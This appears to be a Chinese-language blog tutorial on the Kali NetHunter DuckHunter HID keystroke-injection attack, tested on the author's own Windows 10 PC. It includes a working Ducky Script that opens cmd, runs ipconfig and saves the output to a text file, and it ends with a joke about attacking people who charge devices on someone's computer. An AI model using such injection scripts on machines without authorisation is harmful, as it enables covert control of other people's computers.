今天尝试了一下kali nethunter系统的一个特色功能HID Attack,可以说是无敌的存在啊!!
HID Attack
是一种人机接口设备攻击,就类似与模拟键盘,鼠标,手柄而实现对电脑的操作,
而电脑对于这种攻击的预防可以说是啥也不管,只是识别一下设备,就把它当成了键盘或者鼠标等HID设备,所以插上就能用。
HID Attack我的理解是预先编程好脚本,他会模拟键盘命令输入电脑,实现对系统的各种操作,只要你对系统的快捷操作熟悉,基本就是大神了。但有一点坏处就是所有操作会显示出来,瞎子也能看到被入侵了,所以,想玩好它,还得靠天时地利人和。
今天用的是kali nethunter所支持的DuckHunter HID来攻击我的win10
找到DuckHunter HID工具,进去直接为Convert模式,显示内容不是很复杂,比较容易实现
- Example Presets:里面有四个示范例子,程序自带的,没啥用处
- Preview:这是最核心的地方,在这输入代码。
- load fromsdcard:从SD卡调用一个文件,加载到Preview,调用的是一些普通的文本文件。
- save to sdcard:把你在Preview写入的代码保存为.conf文件。
- ATTACK:输入代码后,用USB连接设备,设备识别完成,点击即可实现攻击。
例子:直接调用cmd,获得IP地址
- REM相当于注释
- DEFAULT_DELAY 默认延迟命令,定义每个后续命令之间等待时间(毫秒)
- WINDOWS R就是win10组合件调用运行窗口
- STRING 打印命令
- ENter 回车键
输入脚本代码后执行,win10就像用键盘一样执行命令,最后获得IP地址
这里使用的是Ducky Script脚本语言编写,任何普通的ASCII文本编译器都可以编写,保存为txt即可,也可以保存为系统存储的.conf格式。
Ducky脚本语法非常的简单,没啥难度,只要有逻辑,基本没问题。
在GitHub有脚本教程,我就不一一教了
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript
#注意每个命令之间的DELAY时间延迟,有时系统会跟不上输入命令速度,导致操作失败。
当然,在GitHub也有很多大神分享的脚本代码,复制粘贴即可用。
这里分享一个把获得IP并保存为TXT,然后复制到桌面的脚本
REM wozijixiajibaluanxiede
DEFAULT_DELAY 1000
WINDOWS R
STRING cmd
ENTER
DELAY 5000
STRING ipconfig
DELAY 2000
CONTROL a
DELAY 2000
CONTROL c
DELAY 1000
STRING exit
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
STRING notepad
DELAY 1000
ENTER
DELAY 2000
CONTROL v
ALT f
STRING S
DELAY 500
STRING ipconfig.TXT
WINDOWS e
DELAY 2000
CTRL f
ENTER
DELAY 2000
STRING ipconfig.TXT
DELAY 5000
TAB
CTRL a
DELAY 1000
CTRL c
DELAY 1000
CTRL w
DELAY 1000
CTRL v
##虽然语法很简单,但是想顺利调用命令,需要掌握电脑操作系统的命令,需要一点点调试代码,才能达到预期的效果。
##还有当别人要拿手机或者pad之类,用你电脑充电时候要小心了,说不定就是我了。
####对于kali我也只算个小白,我只想把学到的知道的都尽量写出来,有不对之处使劲怼,我会检查复习之后再怼回来,有什么问题我也尽量帮忙解答,评论区见#### 
